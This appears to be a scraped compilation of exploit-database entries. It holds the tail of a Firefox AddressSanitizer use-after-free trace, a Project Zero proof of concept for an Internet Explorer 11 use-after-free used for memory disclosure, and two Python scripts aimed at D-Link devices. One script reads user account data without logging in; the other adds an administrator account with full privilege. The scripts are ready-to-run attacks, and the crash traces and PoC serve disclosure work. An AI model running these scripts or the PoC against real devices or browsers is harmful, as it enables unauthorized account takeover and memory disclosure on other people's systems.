    #66 0x7f46da78d923 in nsIFrame::BuildDisplayListForChild(nsDisplayListBuilder*, nsIFrame*, nsRect const&, nsDisplayListSet const&, unsigned int) /home/worker/workspace/build/src/layout/generic/nsFrame.cpp:2954:7
    #67 0x7f46dac0918f in nsBoxFrame::BuildDisplayListForChildren(nsDisplayListBuilder*, nsRect const&, nsDisplayListSet const&) /home/worker/workspace/build/src/layout/xul/nsBoxFrame.cpp:1392:5
    #68 0x7f46dac08048 in nsBoxFrame::BuildDisplayList(nsDisplayListBuilder*, nsRect const&, nsDisplayListSet const&) /home/worker/workspace/build/src/layout/xul/nsBoxFrame.cpp:1352:3
    #69 0x7f46da78d923 in nsIFrame::BuildDisplayListForChild(nsDisplayListBuilder*, nsIFrame*, nsRect const&, nsDisplayListSet const&, unsigned int) /home/worker/workspace/build/src/layout/generic/nsFrame.cpp:2954:7
    #70 0x7f46dac0918f in nsBoxFrame::BuildDisplayListForChildren(nsDisplayListBuilder*, nsRect const&, nsDisplayListSet const&) /home/worker/workspace/build/src/layout/xul/nsBoxFrame.cpp:1392:5
    #71 0x7f46dac64b7e in nsRootBoxFrame::BuildDisplayList(nsDisplayListBuilder*, nsRect const&, nsDisplayListSet const&) /home/worker/workspace/build/src/layout/xul/nsRootBoxFrame.cpp:195:3
    #72 0x7f46da78d923 in nsIFrame::BuildDisplayListForChild(nsDisplayListBuilder*, nsIFrame*, nsRect const&, nsDisplayListSet const&, unsigned int) /home/worker/workspace/build/src/layout/generic/nsFrame.cpp:2954:7
    #73 0x7f46da735b0a in mozilla::ViewportFrame::BuildDisplayList(nsDisplayListBuilder*, nsRect const&, nsDisplayListSet const&) /home/worker/workspace/build/src/layout/generic/ViewportFrame.cpp:63:5
    #74 0x7f46da80417b in nsIFrame::BuildDisplayListForStackingContext(nsDisplayListBuilder*, nsRect const&, nsDisplayList*) /home/worker/workspace/build/src/layout/generic/nsFrame.cpp:2381:5
    #75 0x7f46da6623a6 in nsLayoutUtils::PaintFrame(nsRenderingContext*, nsIFrame*, nsRegion const&, unsigned int, nsDisplayListBuilderMode, nsLayoutUtils::PaintFrameFlags) /home/worker/workspace/build/src/layout/base/nsLayoutUtils.cpp:3565:5
    #76 0x7f46da565487 in mozilla::PresShell::Paint(nsView*, nsRegion const&, unsigned int) /home/worker/workspace/build/src/layout/base/PresShell.cpp:6481:5
    #77 0x7f46d9d6c897 in nsViewManager::ProcessPendingUpdatesPaint(nsIWidget*) /home/worker/workspace/build/src/view/nsViewManager.cpp:484:7
    #78 0x7f46d9d6be97 in nsViewManager::ProcessPendingUpdatesForView(nsView*, bool) /home/worker/workspace/build/src/view/nsViewManager.cpp:416:9
    #79 0x7f46d9d6f40d in nsViewManager::ProcessPendingUpdates() /home/worker/workspace/build/src/view/nsViewManager.cpp:1105:5
    #80 0x7f46da4bfc8a in nsRefreshDriver::Tick(long, mozilla::TimeStamp) /home/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:2037:7
    #81 0x7f46da4cbd25 in mozilla::RefreshDriverTimer::TickRefreshDrivers(long, mozilla::TimeStamp, nsTArray<RefPtr<nsRefreshDriver> >&) /home/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:305:7
    #82 0x7f46da4cb9f4 in mozilla::RefreshDriverTimer::Tick(long, mozilla::TimeStamp) /home/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:327:5
    #83 0x7f46da4ce063 in RunRefreshDrivers /home/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:722:5
    #84 0x7f46da4ce063 in mozilla::VsyncRefreshDriverTimer::RefreshDriverVsyncObserver::TickRefreshDriver(mozilla::TimeStamp) /home/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:631
    #85 0x7f46da4c9157 in mozilla::VsyncRefreshDriverTimer::RefreshDriverVsyncObserver::ParentProcessVsyncNotifier::Run() /home/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:508:9
    #86 0x7f46d3c2db89 in nsThread::ProcessNextEvent(bool, bool*) /home/worker/workspace/build/src/xpcom/threads/nsThread.cpp:1264:7
    #87 0x7f46d3c2a480 in NS_ProcessNextEvent(nsIThread*, bool) /home/worker/workspace/build/src/xpcom/threads/nsThreadUtils.cpp:389:10
    #88 0x7f46d4a43eb4 in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) /home/worker/workspace/build/src/ipc/glue/MessagePump.cpp:124:5
    #89 0x7f46d49b5028 in RunInternal /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:238:3
    #90 0x7f46d49b5028 in RunHandler /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:231
    #91 0x7f46d49b5028 in MessageLoop::Run() /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:211
    #92 0x7f46d9ded82f in nsBaseAppShell::Run() /home/worker/workspace/build/src/widget/nsBaseAppShell.cpp:156:3
    #93 0x7f46dd430051 in nsAppStartup::Run() /home/worker/workspace/build/src/toolkit/components/startup/nsAppStartup.cpp:283:19
    #94 0x7f46dd5edc0c in XREMain::XRE_mainRun() /home/worker/workspace/build/src/toolkit/xre/nsAppRunner.cpp:4470:10
    #95 0x7f46dd5ef708 in XREMain::XRE_main(int, char**, mozilla::BootstrapConfig const&) /home/worker/workspace/build/src/toolkit/xre/nsAppRunner.cpp:4647:8
    #96 0x7f46dd5f09cc in XRE_main(int, char**, mozilla::BootstrapConfig const&) /home/worker/workspace/build/src/toolkit/xre/nsAppRunner.cpp:4738:16
    #97 0x4dfebf in do_main /home/worker/workspace/build/src/browser/app/nsBrowserApp.cpp:234:10
    #98 0x4dfebf in main /home/worker/workspace/build/src/browser/app/nsBrowserApp.cpp:305
    #99 0x7f46eefdb82f in __libc_start_main /build/glibc-t3gR2i/glibc-2.23/csu/../csu/libc-start.c:291
    #100 0x41c2e8 in _start (/home/ifratric/p0/latest/firefox/firefox+0x41c2e8)

0x60b000214ce8 is located 88 bytes inside of 112-byte region [0x60b000214c90,0x60b000214d00)
freed by thread T0 here:
    #0 0x4b2a3b in __interceptor_free /builds/slave/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:38:3
    #1 0x7f46d3acb2c4 in SnowWhiteKiller::~SnowWhiteKiller() /home/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:2664:9
    #2 0x7f46d3acaeb6 in nsCycleCollector::FreeSnowWhite(bool) /home/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:2839:3
    #3 0x7f46d53d990e in AsyncFreeSnowWhite::Run() /home/worker/workspace/build/src/js/xpconnect/src/XPCJSContext.cpp:145:34
    #4 0x7f46d3c2db89 in nsThread::ProcessNextEvent(bool, bool*) /home/worker/workspace/build/src/xpcom/threads/nsThread.cpp:1264:7
    #5 0x7f46d3c2a480 in NS_ProcessNextEvent(nsIThread*, bool) /home/worker/workspace/build/src/xpcom/threads/nsThreadUtils.cpp:389:10
    #6 0x7f46d4a43ebf in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) /home/worker/workspace/build/src/ipc/glue/MessagePump.cpp:96:21
    #7 0x7f46d49b5028 in RunInternal /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:238:3
    #8 0x7f46d49b5028 in RunHandler /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:231
    #9 0x7f46d49b5028 in MessageLoop::Run() /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:211
    #10 0x7f46d9ded82f in nsBaseAppShell::Run() /home/worker/workspace/build/src/widget/nsBaseAppShell.cpp:156:3
    #11 0x7f46dd430051 in nsAppStartup::Run() /home/worker/workspace/build/src/toolkit/components/startup/nsAppStartup.cpp:283:19
    #12 0x7f46dd5edc0c in XREMain::XRE_mainRun() /home/worker/workspace/build/src/toolkit/xre/nsAppRunner.cpp:4470:10
    #13 0x7f46dd5ef708 in XREMain::XRE_main(int, char**, mozilla::BootstrapConfig const&) /home/worker/workspace/build/src/toolkit/xre/nsAppRunner.cpp:4647:8
    #14 0x7f46dd5f09cc in XRE_main(int, char**, mozilla::BootstrapConfig const&) /home/worker/workspace/build/src/toolkit/xre/nsAppRunner.cpp:4738:16
    #15 0x4dfebf in do_main /home/worker/workspace/build/src/browser/app/nsBrowserApp.cpp:234:10
    #16 0x4dfebf in main /home/worker/workspace/build/src/browser/app/nsBrowserApp.cpp:305
    #17 0x7f46eefdb82f in __libc_start_main /build/glibc-t3gR2i/glibc-2.23/csu/../csu/libc-start.c:291

previously allocated by thread T0 here:
    #0 0x4b2d5b in malloc /builds/slave/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:52:3
    #1 0x4e10cd in moz_xmalloc /home/worker/workspace/build/src/memory/mozalloc/mozalloc.cpp:83:17
    #2 0x7f46d6796c00 in operator new /home/worker/workspace/build/src/obj-firefox/dist/include/mozilla/mozalloc.h:194:12
    #3 0x7f46d6796c00 in nsRange::CloneRange() const /home/worker/workspace/build/src/dom/base/nsRange.cpp:2495
    #4 0x7f46d67970ba in nsRange::CloneRange(nsIDOMRange**) /home/worker/workspace/build/src/dom/base/nsRange.cpp:2507:14
    #5 0x7f46d66801d4 in nsHTMLCopyEncoder::SetSelection(nsISelection*) /home/worker/workspace/build/src/dom/base/nsDocumentEncoder.cpp:1426:5
    #6 0x7f46d6596c5e in SelectionCopyHelper(nsISelection*, nsIDocument*, bool, short, unsigned int, nsITransferable**) /home/worker/workspace/build/src/dom/base/nsCopySupport.cpp:199:10
    #7 0x7f46da97e9ee in nsAutoCopyListener::NotifySelectionChanged(nsIDOMDocument*, nsISelection*, short) /home/worker/workspace/build/src/layout/generic/nsSelection.cpp:6667:10
    #8 0x7f46da95f019 in mozilla::dom::Selection::NotifySelectionListeners() /home/worker/workspace/build/src/layout/generic/nsSelection.cpp:6254:5
    #9 0x7f46da97806c in NotifySelectionListeners /home/worker/workspace/build/src/layout/generic/nsSelection.cpp:2429:12
    #10 0x7f46da97806c in mozilla::dom::Selection::Extend(nsINode&, unsigned int, mozilla::ErrorResult&) /home/worker/workspace/build/src/layout/generic/nsSelection.cpp:5762
    #11 0x7f46da9533e7 in Extend /home/worker/workspace/build/src/layout/generic/nsSelection.cpp:5474:3
    #12 0x7f46da9533e7 in nsFrameSelection::TakeFocus(nsIContent*, unsigned int, unsigned int, mozilla::CaretAssociationHint, bool, bool) /home/worker/workspace/build/src/layout/generic/nsSelection.cpp:1873
    #13 0x7f46da94ebaf in nsFrameSelection::MoveCaret(nsDirection, bool, nsSelectionAmount, nsFrameSelection::CaretMovementStyle) /home/worker/workspace/build/src/layout/generic/nsSelection.cpp:1160:14
    #14 0x7f46da97c97d in mozilla::dom::Selection::Modify(nsAString_internal const&, nsAString_internal const&, nsAString_internal const&, mozilla::ErrorResult&) /home/worker/workspace/build/src/layout/generic/nsSelection.cpp:6426:8
    #15 0x7f46d730a949 in mozilla::dom::SelectionBinding::modify(JSContext*, JS::Handle<JSObject*>, mozilla::dom::Selection*, JSJitMethodCallArgs const&) /home/worker/workspace/build/src/obj-firefox/dom/bindings/SelectionBinding.cpp:778:3
    #16 0x7f46d7fdbf77 in mozilla::dom::GenericBindingMethod(JSContext*, unsigned int, JS::Value*) /home/worker/workspace/build/src/dom/bindings/BindingUtils.cpp:2951:13
    #17 0x7f46dda78c24 in CallJSNative /home/worker/workspace/build/src/js/src/jscntxtinlines.h:281:15
    #18 0x7f46dda78c24 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:463
    #19 0x7f46dda5ef88 in CallFromStack /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:514:12
    #20 0x7f46dda5ef88 in Interpret(JSContext*, js::RunState&) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:2960
    #21 0x7f46dda4411a in js::RunScript(JSContext*, js::RunState&) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:409:12
    #22 0x7f46dda78eb7 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:481:15
    #23 0x7f46dda79552 in js::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, js::AnyInvokeArgs const&, JS::MutableHandle<JS::Value>) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:527:10
    #24 0x7f46de426f3c in JS::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, JS::HandleValueArray const&, JS::MutableHandle<JS::Value>) /home/worker/workspace/build/src/js/src/jsapi.cpp:2865:12
    #25 0x7f46d7b59632 in mozilla::dom::EventHandlerNonNull::Call(JSContext*, JS::Handle<JS::Value>, mozilla::dom::Event&, JS::MutableHandle<JS::Value>, mozilla::ErrorResult&) /home/worker/workspace/build/src/obj-firefox/dom/bindings/EventHandlerBinding.cpp:260:37
    #26 0x7f46d845fbbd in Call<nsISupports *> /home/worker/workspace/build/src/obj-firefox/dist/include/mozilla/dom/EventHandlerBinding.h:362:12
    #27 0x7f46d845fbbd in mozilla::JSEventHandler::HandleEvent(nsIDOMEvent*) /home/worker/workspace/build/src/dom/events/JSEventHandler.cpp:214
    #28 0x7f46d842a6f9 in mozilla::EventListenerManager::HandleEventSubType(mozilla::EventListenerManager::Listener*, nsIDOMEvent*, mozilla::dom::EventTarget*) /home/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1123:16
    #29 0x7f46d842c5b4 in mozilla::EventListenerManager::HandleEventInternal(nsPresContext*, mozilla::WidgetEvent*, nsIDOMEvent**, mozilla::dom::EventTarget*, nsEventStatus*) /home/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1297:20
    #30 0x7f46d8416eb3 in mozilla::EventTargetChainItem::HandleEventTargetChain(nsTArray<mozilla::EventTargetChainItem>&, mozilla::EventChainPostVisitor&, mozilla::EventDispatchingCallback*, mozilla::ELMCreationDetector&) /home/worker/workspace/build/src/dom/events/EventDispatcher.cpp:465:5
    #31 0x7f46d841a744 in mozilla::EventDispatcher::Dispatch(nsISupports*, nsPresContext*, mozilla::WidgetEvent*, nsIDOMEvent*, nsEventStatus*, mozilla::EventDispatchingCallback*, nsTArray<mozilla::dom::EventTarget*>*) /home/worker/workspace/build/src/dom/events/EventDispatcher.cpp:822:9
    #32 0x7f46da62158e in nsDocumentViewer::LoadComplete(nsresult) /home/worker/workspace/build/src/layout/base/nsDocumentViewer.cpp:1044:7
    #33 0x7f46dcae3e7f in nsDocShell::EndPageLoad(nsIWebProgress*, nsIChannel*, nsresult) /home/worker/workspace/build/src/docshell/base/nsDocShell.cpp:7632:5
    #34 0x7f46dcadfc44 in nsDocShell::OnStateChange(nsIWebProgress*, nsIRequest*, unsigned int, nsresult) /home/worker/workspace/build/src/docshell/base/nsDocShell.cpp:7426:7
    #35 0x7f46dcae765f in non-virtual thunk to nsDocShell::OnStateChange(nsIWebProgress*, nsIRequest*, unsigned int, nsresult) /home/worker/workspace/build/src/docshell/base/nsDocShell.cpp:7323:13

SUMMARY: AddressSanitizer: heap-use-after-free /home/worker/workspace/build/src/obj-firefox/dist/include/mozilla/RefPtr.h:308:36 in operator!
Shadow bytes around the buggy address:
  0x0c168003a940: fd fd fd fd fd fd fd fd fa fa fa fa fa fa fa fa
  0x0c168003a950: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fa fa
  0x0c168003a960: fa fa fa fa fa fa 00 00 00 00 00 00 00 00 00 00
  0x0c168003a970: 00 00 00 fa fa fa fa fa fa fa fa fa fd fd fd fd
  0x0c168003a980: fd fd fd fd fd fd fd fd fd fa fa fa fa fa fa fa
=>0x0c168003a990: fa fa fd fd fd fd fd fd fd fd fd fd fd[fd]fd fd
  0x0c168003a9a0: fa fa fa fa fa fa fa fa fd fd fd fd fd fd fd fd
  0x0c168003a9b0: fd fd fd fd fd fd fa fa fa fa fa fa fa fa fd fd
  0x0c168003a9c0: fd fd fd fd fd fd fd fd fd fd fd fd fa fa fa fa
  0x0c168003a9d0: fa fa fa fa fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c168003a9e0: fd fd fa fa fa fa fa fa fa fa fd fd fd fd fd fd
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07 
  Heap left redzone:       fa
  Heap right redzone:      fb
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack partial redzone:   f4
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
==119582==ABORTING
-->
HireHackking 
<!--
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1076

There is an use-after-free bug in IE which can lead to info leak / memory disclosure.

The bug was confirmed on Internet Explorer version 11.0.9600.18537 (update version 11.0.38)

PoC:
=========================================
-->

<!-- saved from url=(0014)about:internet -->
<script>

function run() {
  var textarea = document.getElementById("textarea");
  var frame = document.createElement("iframe");

  textarea.appendChild(frame);

  frame.contentDocument.onreadystatechange = eventhandler;

  form.reset();
}

function eventhandler() {
  document.getElementById("textarea").defaultValue = "foo";
  alert("Text value freed, can be reallocated here");
}

</script>
<body onload=run()>
<form id="form">
<textarea id="textarea" cols="80">aaaaaaaaaaaaaaaaaaaaaaaa</textarea>

<!--
=========================================

Please also see the attached screenshots that demonstrate using the PoC for memory disclosure.

The root cause of a bug is actually a use-after-free on the textarea text value, which can be seen if a PoC is run with Page Heap enabled. In that case IE crashes at

(b5c.f44): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=10abbff8 ebx=00000002 ecx=10abbff8 edx=10abbff8 esi=0e024ffc edi=00000000
eip=7582c006 esp=0a3aac48 ebp=0a3aac54 iopl=0         nv up ei pl nz na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010206
msvcrt!wcscpy_s+0x46:
7582c006 0fb706          movzx   eax,word ptr [esi]       ds:002b:0e024ffc=????
0:008> k
 # ChildEBP RetAddr  
00 0a3aac54 7198e8f0 msvcrt!wcscpy_s+0x46
01 0a3aad48 7189508e MSHTML!CElement::InjectInternal+0x6fa
02 0a3aad88 7189500c MSHTML!CRichtext::SetValueHelperInternal+0x79
03 0a3aada0 71894cf9 MSHTML!CRichtext::DoReset+0x3f
04 0a3aae24 71894b73 MSHTML!CFormElement::DoReset+0x157
05 0a3aae40 706c05da MSHTML!CFastDOM::CHTMLFormElement::Trampoline_reset+0x33
06 0a3aaeb0 706b6d73 jscript9!Js::JavascriptExternalFunction::ExternalFunctionThunk+0x19d
07 0a3aaef8 706baa24 jscript9!Js::JavascriptFunction::CallFunction<1>+0x91
08 0a3ab19c 7071451a jscript9!Js::InterpreterStackFrame::Process+0x3a10
09 0a3ab1d4 70714579 jscript9!Js::InterpreterStackFrame::OP_TryCatch+0x49
0a 0a3ab478 706bdbe9 jscript9!Js::InterpreterStackFrame::Process+0x49a8
0b 0a3ab5b4 09780fd9 jscript9!Js::InterpreterStackFrame::InterpreterThunk<1>+0x200
WARNING: Frame IP not in any known module. Following frames may be wrong.
0c 0a3ab5c0 706bda16 0x9780fd9
0d 0a3ab868 706bdbe9 jscript9!Js::InterpreterStackFrame::Process+0x1e62
0e 0a3ab984 09780fe1 jscript9!Js::InterpreterStackFrame::InterpreterThunk<1>+0x200
0f 0a3ab990 706b6d73 0x9780fe1
10 0a3ab9dc 706b73a8 jscript9!Js::JavascriptFunction::CallFunction<1>+0x91
11 0a3aba50 706b72dd jscript9!Js::JavascriptFunction::CallRootFunction+0xb5
12 0a3aba98 706b7270 jscript9!ScriptSite::CallRootFunction+0x42
13 0a3abae4 7086d8f8 jscript9!ScriptSite::Execute+0xd2
14 0a3abb48 7165a587 jscript9!ScriptEngineBase::Execute+0xc7
15 0a3abc04 7165a421 MSHTML!CListenerDispatch::InvokeVar+0x15a
16 0a3abc30 7165a11c MSHTML!CListenerDispatch::Invoke+0x6d
17 0a3abcd0 7165a286 MSHTML!CEventMgr::_InvokeListeners+0x210
18 0a3abce8 7165a1ad MSHTML!CEventMgr::_InvokeListenersOnWindow+0x42
19 0a3abd78 71659f1b MSHTML!CEventMgr::_InvokeListeners+0x150
1a 0a3abedc 714df1d7 MSHTML!CEventMgr::Dispatch+0x4d5
1b 0a3abf08 71969808 MSHTML!CEventMgr::DispatchEvent+0x90
1c 0a3abf40 7132de1f MSHTML!COmWindowProxy::Fire_onload+0x146
1d 0a3abfa0 7132df9c MSHTML!CMarkup::OnLoadStatusDone+0x5c0
1e 0a3abfbc 7132cd31 MSHTML!CMarkup::OnLoadStatus+0xed
1f 0a3ac400 714e8062 MSHTML!CProgSink::DoUpdate+0x48d
20 0a3ac40c 712de2f9 MSHTML!CProgSink::OnMethodCall+0x12
21 0a3ac45c 712ddcfa MSHTML!GlobalWndOnMethodCall+0x16c
22 0a3ac4b0 759962fa MSHTML!GlobalWndProc+0x103
23 0a3ac4dc 75996d3a user32!InternalCallWinProc+0x23
24 0a3ac554 759977c4 user32!UserCallWinProcCheckWow+0x109
25 0a3ac5b4 7599788a user32!DispatchMessageWorker+0x3b5
26 0a3ac5c4 726da99c user32!DispatchMessageW+0xf
27 0a3af794 7277ec38 IEFRAME!CTabWindow::_TabWindowThreadProc+0x464
28 0a3af854 765182ec IEFRAME!LCIETab_ThreadProc+0x3e7
29 0a3af86c 73f73a31 iertutil!CMemBlockRegistrar::_LoadProcs+0x67
2a 0a3af8a4 75e0336a IEShims!NS_CreateThread::DesktopIE_ThreadProc+0x94
2b 0a3af8b0 77b19902 kernel32!BaseThreadInitThunk+0xe
2c 0a3af8f0 77b198d5 ntdll!__RtlUserThreadStart+0x70
2d 0a3af908 00000000 ntdll!_RtlUserThreadStart+0x1b

where the old value was deleated at

0:008> !heap -p -a 0e024ffc
    address 0e024ffc found in
    _DPH_HEAP_ROOT @ f1000
    in free-ed allocation (  DPH_HEAP_BLOCK:         VirtAddr         VirtSize)
                                    dd03820:          e024000             2000
    7417947d verifier!AVrfDebugPageHeapReAllocate+0x0000036d
    77bb126b ntdll!RtlDebugReAllocateHeap+0x00000033
    77b6de86 ntdll!RtlReAllocateHeap+0x00000054
    71ba761f MSHTML!CTravelLog::_AddEntryInternal+0x00000215
    71b8f48d MSHTML!MemoryProtection::HeapReAlloc<0>+0x00000026
    71b8f446 MSHTML!_HeapRealloc<0>+0x00000011
    7162deea MSHTML!BASICPROPPARAMS::SetStringProperty+0x00000546
    71678877 MSHTML!CBase::put_StringHelper+0x0000004d
    71fc6d60 MSHTML!CFastDOM::CHTMLTextAreaElement::Trampoline_Set_defaultValue+0x00000070
    706c05da jscript9!Js::JavascriptExternalFunction::ExternalFunctionThunk+0x0000019d
    706c0f77 jscript9!Js::JavascriptOperators::CallSetter+0x00000138
    706c0eb4 jscript9!Js::JavascriptOperators::CallSetter+0x00000076
    70710cd3 jscript9!Js::JavascriptOperators::SetProperty_Internal<0>+0x00000341
    70710b26 jscript9!Js::JavascriptOperators::OP_SetProperty+0x00000040
    70710ba6 jscript9!Js::JavascriptOperators::PatchPutValueNoFastPath+0x0000004d
    706ba60e jscript9!Js::InterpreterStackFrame::Process+0x00002c1e
    706bdbe9 jscript9!Js::InterpreterStackFrame::InterpreterThunk<1>+0x00000200

Note: because the text allocations aren't protected by MemGC and happen on the process heap, use-after-free bugs dealing with text allocations are still exploitable.

Screenshots:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/41661.zip
-->
HireHackking 
================
get-user-info.py
================

import re
import os.path
import urllib2
import base64
import gzip
import zlib
from StringIO import StringIO
from io import BytesIO

def make_requests():
	"""Calls request functions sequentially."""
	response = [None]
	responseText = None

	if(request_ip(response)):
		# Success, possibly use response.
		responseText = read_response(response[0])
                print responseText
		response[0].close()
	else:
		# Failure, cannot use response.
		pass


def read_response(response):
	""" Returns the text contained in the response.  For example, the page HTML.  Only handles the most common HTTP encodings."""
	if response.info().get('Content-Encoding') == 'gzip':
		buf = StringIO(response.read())
		return gzip.GzipFile(fileobj=buf).read()

	elif response.info().get('Content-Encoding') == 'deflate':
		decompress = zlib.decompressobj(-zlib.MAX_WBITS)
		inflated = decompress.decompress(response.read())
		inflated += decompress.flush()
		return inflated

	return response.read()


def request_ip(response):
	"""Tries to request the URL. Returns True if the request was successful; false otherwise.
	http://ip_address/DataStore/990_user_account.js?index=0&pagesize=10
	
	response -- After the function has finished, will possibly contain the response to the request.
	
	"""
	response[0] = None

	try:
		# Create request to URL.
                import sys
                ip = sys.argv[1]
                print ip
		req = urllib2.Request("http://%s/DataStore/990_user_account.js?index=0&pagesize=10"% ip)

		# Set request headers.
		req.add_header("Connection", "keep-alive")
		req.add_header("Accept", "text/javascript, application/javascript, application/ecmascript, application/x-ecmascript, */*; q=0.01")
		req.add_header("X-Requested-With", "XMLHttpRequest")
		req.add_header("User-Agent", "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.59 Safari/537.36")
		req.add_header("Referer", "http://%s/www/login.html"% ip)
		req.add_header("Accept-Encoding", "gzip, deflate, sdch")
		req.add_header("Accept-Language", "en-US,en;q=0.8")
		req.add_header("Cookie", "Language=en")

		# Get response to request.
		response[0] = urllib2.urlopen(req)

	except urllib2.URLError, e:
		# URLError.code existing indicates a valid HTTP response, but with a non-200 status code (e.g. 304 Not Modified, 404 Not Found)
		if not hasattr(e, "code"):
			return False
		response[0] = e
	except:
		return False

	return True


make_requests()

===========
user_add.py
===========

import re
import os.path
import urllib2
import base64
import gzip
import zlib
from StringIO import StringIO
from io import BytesIO

def make_requests():
	"""Calls request functions sequentially."""
	response = [None]
	responseText = None

	if(request_ip(response)):
		# Success, possibly use response.
		responseText = read_response(response[0])
                print "Username dlinktest is successfully Added"
		response[0].close()
	else:
		# Failure, cannot use response.
                print "locha"
		pass


def read_response(response):
	""" Returns the text contained in the response.  For example, the page HTML.  Only handles the most common HTTP encodings."""
	if response.info().get('Content-Encoding') == 'gzip':
		buf = StringIO(response.read())
		return gzip.GzipFile(fileobj=buf).read()

	elif response.info().get('Content-Encoding') == 'deflate':
		decompress = zlib.decompressobj(-zlib.MAX_WBITS)
		inflated = decompress.decompress(response.read())
		inflated += decompress.flush()
		return inflated

	return response.read()


def request_ip(response):
	"""Tries to request the URL. Returns True if the request was successful; false otherwise.
	http://ip_address/form/User_Accounts_Apply
	
	response -- After the function has finished, will possibly contain the response to the request.
	
	"""
	response[0] = None

	try:
		# Create request to URL.
                import sys
                ip = sys.argv[1]
		req = urllib2.Request("http://%s/form/User_Accounts_Apply"% ip)

		# Set request headers.
		req.add_header("Connection", "keep-alive")
		req.add_header("Cache-Control", "max-age=0")
		req.add_header("Origin", "http://%s/"% ip)
		req.add_header("Upgrade-Insecure-Requests", "1")
		req.add_header("User-Agent", "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.51 Safari/537.36")
		req.add_header("Content-Type", "application/x-www-form-urlencoded")
		req.add_header("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8")
		req.add_header("Referer", "http://%s/www/login.html"% ip)
		req.add_header("Accept-Encoding", "gzip, deflate")
		req.add_header("Accept-Language", "en-US,en;q=0.8")

		# Set request body.
		body = "action=0&username=admin2&privilege=15&type=0&password=admin2"

		# Get response to request.
		response[0] = urllib2.urlopen(req, body)

	except urllib2.URLError, e:
		# URLError.code existing indicates a valid HTTP response, but with a non-200 status code (e.g. 304 Not Modified, 404 Not Found)
		if not hasattr(e, "code"):
			return False
		response[0] = e
	except:
		return False

	return True


make_requests()